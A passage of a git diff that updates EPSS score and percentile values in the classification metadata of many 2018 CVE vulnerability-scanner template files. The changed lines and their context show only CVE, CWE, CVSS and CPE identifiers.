b/http/cves/2018/CVE-2018-12998.yaml index d19c16cf3d7..85558da8fb6 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.47663 - epss-percentile: 0.97609 + epss-percentile: 0.97603 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13317.yaml b/http/cves/2018/CVE-2018-13317.yaml index 32c38caa822..c6d029d299c 100644 --- a/http/cves/2018/CVE-2018-13317.yaml +++ b/http/cves/2018/CVE-2018-13317.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2018-13317 epss-score: 0.00262 - epss-percentile: 0.49334 + epss-percentile: 0.49305 cwe-id: CWE-79 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 1610d0b9db4..17a6e57b869 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.11342 - epss-percentile: 0.93336 + epss-percentile: 0.9333 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 870a3aa7206..dcf993a4126 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.41164 - epss-percentile: 0.97267 + epss-percentile: 0.97266 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 4ebc95b1223..30404ac9865 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.02192 - epss-percentile: 0.83962 + epss-percentile: 0.83958 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 65862d620f7..ab3692142b4 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.09501 - epss-percentile: 0.92592 + epss-score: 0.09753 + epss-percentile: 0.92706 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index b635f2db7f6..b2f50184554 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-14728 cwe-id: CWE-918 epss-score: 0.90868 - epss-percentile: 0.99609 + epss-percentile: 0.99608 cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index b7b6a8ea441..2f2537d8668 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.68248 - epss-percentile: 0.9854 + epss-percentile: 0.98543 cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index fe4c1e5144b..11430451a5d 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.07006 - epss-percentile: 0.91203 + epss-percentile: 0.91201 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 4ac5b3b27b2..b703e3b0c49 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.76866 - epss-percentile: 0.98909 + epss-percentile: 0.98908 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 10210b27ff0..5d6a35b671d 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.81247 - epss-percentile: 0.99128 + epss-percentile: 0.9913 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15811.yaml b/http/cves/2018/CVE-2018-15811.yaml index 65d14e30c07..e10647a9f61 100644 --- a/http/cves/2018/CVE-2018-15811.yaml +++ b/http/cves/2018/CVE-2018-15811.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15811 cwe-id: CWE-326 epss-score: 0.91142 - epss-percentile: 0.99626 + epss-percentile: 0.99625 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index ec3c434fef5..bdbc22d02d3 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.00609 - epss-percentile: 0.69127 + epss-percentile: 0.69112 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index f36bed6ba71..8b4761a639a 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.02063 - epss-percentile: 0.83472 + epss-percentile: 0.83469 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 749d5c3a611..b95b0d0275b 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.6366 - epss-percentile: 0.9835 + epss-percentile: 0.98352 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index d70f0bf34b3..5eb05e3d453 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.84841 - epss-percentile: 0.99309 + epss-percentile: 0.99308 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 2f318fb429e..ab815294948 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.43027 - epss-percentile: 0.97378 + epss-percentile: 0.97375 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 13abb3c5e8d..c22430108e7 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.45583 - epss-percentile: 0.97506 + epss-percentile: 0.97501 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 58ded501ad2..6d89ac92710 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.42489 - epss-percentile: 0.97346 + epss-percentile: 0.97342 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 12adeaa01c9..7294ab95b0e 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16716 cwe-id: CWE-22 epss-score: 0.44536 - epss-percentile: 0.97455 + epss-percentile: 0.97451 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 5316c3fa967..ece96c56970 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.02174 - epss-percentile: 0.83897 + epss-percentile: 0.83891 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 5e921001486..7763cc161af 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.0833 - epss-percentile: 0.92013 + epss-percentile: 0.92008 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17082.yaml b/http/cves/2018/CVE-2018-17082.yaml index 3e1d7b39706..e15dbb6bc86 100644 --- a/http/cves/2018/CVE-2018-17082.yaml +++ b/http/cves/2018/CVE-2018-17082.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-17082 cwe-id: CWE-79 epss-score: 0.081 - epss-percentile: 0.91896 + epss-percentile: 0.91893 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: verified: false diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 8168296d2cb..ff1bedf974f 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-17153 cwe-id: CWE-287 epss-score: 0.92205 - epss-percentile: 0.99702 + epss-percentile: 0.99701 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17173.yaml b/http/cves/2018/CVE-2018-17173.yaml index 7b4457661f1..fa6646389be 100644 --- a/http/cves/2018/CVE-2018-17173.yaml +++ b/http/cves/2018/CVE-2018-17173.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-17173 cwe-id: CWE-94 epss-score: 0.76568 - epss-percentile: 0.98897 + epss-percentile: 0.98896 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17283.yaml b/http/cves/2018/CVE-2018-17283.yaml index ffd9e0fd78d..53fc783a4ea 100644 --- a/http/cves/2018/CVE-2018-17283.yaml +++ b/http/cves/2018/CVE-2018-17283.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-17283 cwe-id: CWE-89 epss-score: 0.28841 - epss-percentile: 0.96409 + epss-percentile: 0.96414 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* reference: - https://github.com/x-f1v3/forcve/issues/4 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index bec7d339eec..88ccf2c9e30 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.10795 - epss-percentile: 0.93129 + epss-percentile: 0.93124 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index c99ceaaa621..c1919d8194e 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.9241 - epss-percentile: 0.99716 + epss-percentile: 0.99715 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 1075f17a16d..730335c92f8 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.14198 - epss-percentile: 0.94176 + epss-percentile: 0.94171 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index c0007c32609..066fe74255a 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-18264 cwe-id: CWE-306 epss-score: 0.9085 - epss-percentile: 0.99607 + epss-percentile: 0.99606 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18325.yaml b/http/cves/2018/CVE-2018-18325.yaml index b02a5a8c6de..72bafd3446b 100644 --- a/http/cves/2018/CVE-2018-18325.yaml +++ b/http/cves/2018/CVE-2018-18325.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-18325 cwe-id: CWE-326 epss-score: 0.91084 - epss-percentile: 0.99623 + epss-percentile: 0.99621 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 3a40ad4c0e1..e26ec32e822 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.11047 - epss-percentile: 0.9322 + epss-percentile: 0.93215 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index f54e7de7151..2d29bd17c66 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.07885 - epss-percentile: 0.91761 + epss-percentile: 0.91758 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index a278a71cb23..0e8bc0397eb 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.16021 - epss-percentile: 0.94566 + epss-percentile: 0.94564 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 201d1ceaa59..e2cc8a148db 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.93737 - epss-percentile: 0.9984 + epss-percentile: 0.99841 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-19127.yaml b/http/cves/2018/CVE-2018-19127.yaml index f36ebd6b3de..4bd3c3c4e90 100644 --- a/http/cves/2018/CVE-2018-19127.yaml +++ b/http/cves/2018/CVE-2018-19127.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-19127 epss-score: 0.84845 - epss-percentile: 0.99309 + epss-percentile: 0.99308 cwe-id: CWE-94 cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index ee809288768..cfbbe5783be 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.02193 - epss-percentile: 0.83966 + epss-percentile: 0.83961 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 2a2ec9c1a65..2379c9c3b4a 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.01684 - epss-percentile: 0.8176 + epss-percentile: 0.81755 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 1307e75737f..184280c5d26 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19287 cwe-id: CWE-79 epss-score: 0.10724 - epss-percentile: 0.93107 + epss-percentile: 0.93101 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 35cc67eeb61..4ee0974668b 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19365 cwe-id: CWE-22 epss-score: 0.8708 - epss-percentile: 0.99416 + epss-percentile: 0.99418 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 24cb190b4d8..20f66948313 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.23271 - epss-percentile: 0.95767 + epss-percentile: 0.95771 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index e092067115c..8648118a43c 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19749 cwe-id: CWE-79 epss-score: 0.00236 - epss-percentile: 0.46338 + epss-percentile: 0.46315 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index c9da6262d59..29b76f7364b 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19751 cwe-id: CWE-79 epss-score: 0.00236 - epss-percentile: 0.46338 + epss-percentile: 0.46315 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index c58881dc4a8..d6cb6a6f1ac 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19752 cwe-id: CWE-79 epss-score: 0.00236 - epss-percentile: 0.46338 + epss-percentile: 0.46315 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index e7366a92716..32dc52fcc10 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19753 cwe-id: CWE-22 epss-score: 0.73324 - epss-percentile: 0.9875 + epss-percentile: 0.98749 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 9ac92b1854d..9003233c7d0 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19877 cwe-id: CWE-79 epss-score: 0.12683 - epss-percentile: 0.93768 + epss-percentile: 0.93763 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 85bbc63fcf4..6bbd2a8db09 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.01183 - epss-percentile: 0.78346 + epss-percentile: 0.78342 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 15e83da29b7..214ad1074ad 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19914 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.48614 + epss-percentile: 0.48587 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index d37fd40e254..73179a56a86 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19915 cwe-id: CWE-79 epss-score: 0.00392 - epss-percentile: 0.5968 + epss-percentile: 0.59678 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 28ec9c3122f..b8d421a2652 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-20009 cwe-id: CWE-79 epss-score: 0.00511 - epss-percentile: 0.65865 + epss-percentile: 0.65848 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 90915ca25ac..f40c106a521 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20010 cwe-id: CWE-79 epss-score: 0.00511 - epss-percentile: 0.65865 + epss-percentile: 0.65848 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 5513c7a7656..6bcbe93f619 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.00511 - epss-percentile: 0.65865 + epss-percentile: 0.65848 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 16562c69c58..b66d0c405d6 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.01584 - epss-percentile: 0.81183 + epss-percentile: 0.81174 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4a08ec3fb5d..f94c628552b 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.90404 - epss-percentile: 0.99585 + epss-percentile: 0.99584 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 99d4de0a4b0..7d735e41f20 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-20824 cwe-id: CWE-79 - epss-score: 0.46419 - epss-percentile: 0.97558 + epss-score: 0.30326 + epss-percentile: 0.96546 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 7664565775e..994aee6baba 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20985 cwe-id: CWE-20 epss-score: 0.42918 - epss-percentile: 0.97374 + epss-percentile: 0.97371 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-25114.yaml b/http/cves/2018/CVE-2018-25114.yaml index 36045c64be5..abac25a0301 100644 --- a/http/cves/2018/CVE-2018-25114.yaml +++ b/http/cves/2018/CVE-2018-25114.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-25114 cwe-id: CWE-94 epss-score: 0.75339 - epss-percentile: 0.98838 + epss-percentile: 0.98836 metadata: verified: true max-request: 2 diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index c78c6429d08..359b5e5a820 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.87017 - epss-percentile: 0.99413 + epss-percentile: 0.99414 cpe: 